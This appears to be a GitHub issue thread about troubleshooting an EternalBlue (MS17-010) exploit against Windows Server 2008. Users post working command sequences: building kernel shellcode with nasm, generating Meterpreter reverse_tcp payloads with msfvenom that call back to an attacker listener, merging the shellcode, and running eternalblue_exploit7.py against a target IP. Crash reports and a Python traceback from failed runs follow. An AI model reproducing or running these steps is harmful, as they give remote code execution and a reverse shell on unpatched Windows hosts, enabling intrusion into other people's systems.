Closed benichmt1 closed 7 years ago
I can confirm this is an issue. https://i.pitterapp.com/aJS0WbOpi.PNG
I have successfully exploited Windows Server 2008 R1 x64 doing the following:
nasm -f bin eternalblue_kshellcode_x64.asm
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=<LOCAL_IP> LPORT=4444
cat eternalblue_kshellcode_x64 meterpreter_msf.bin > sc_x64.bin
python eternalblue_exploit7.py <TARGET_IP> shellcode/sc_x64.bin
I did not use the eternalblue_merge_shellcode.py
, which I wouldn't recommend using if you know the architecture of the target.
I can confirm @vivami 's steps work:
However, it is incredibly unreliable and results in the following crash 80% of the time:
The other type of crash experienced happens occasionally when exiting the Meterpreter session:
@RickTorresJr yes it is true. i have the same issue like you.
Error about Windows is restarted in one minute is caused from lsass.exe get crashed. It is crashed because of bad userland shellcode.
So this issue is you guys did not use exploit correctly.
Hi How i can resolved this problem?
Reproduction steps:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4444
...
$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4445 ...
Run eternalblue_merge_shellcode.py
./eternalblue_merge_shellcode.py sc_x86_msf.bin sc_x64_msf.bin sc_out.bin
Run
python eternalblue_exploit7.py IP /opt/MS17-010/shellcode/sc_all.bin
Begins connection then fails. Machine crashes.
shellcode size: 874 numGroomConn: 13 Target OS: Windows Server 2008 R2 Enterprise 7601 Service Pack 1 SMB1 session setup allocate nonpaged pool success SMB1 session setup allocate nonpaged pool success Traceback (most recent call last): File "eternalblue_exploit7.py", line 582, in
exploit(TARGET, sc, numGroomConn)
File "eternalblue_exploit7.py", line 544, in exploit
recvPkt = conn.recvSMB()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
data = self.read(timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in read
data = self.read_function(4, timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 918, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.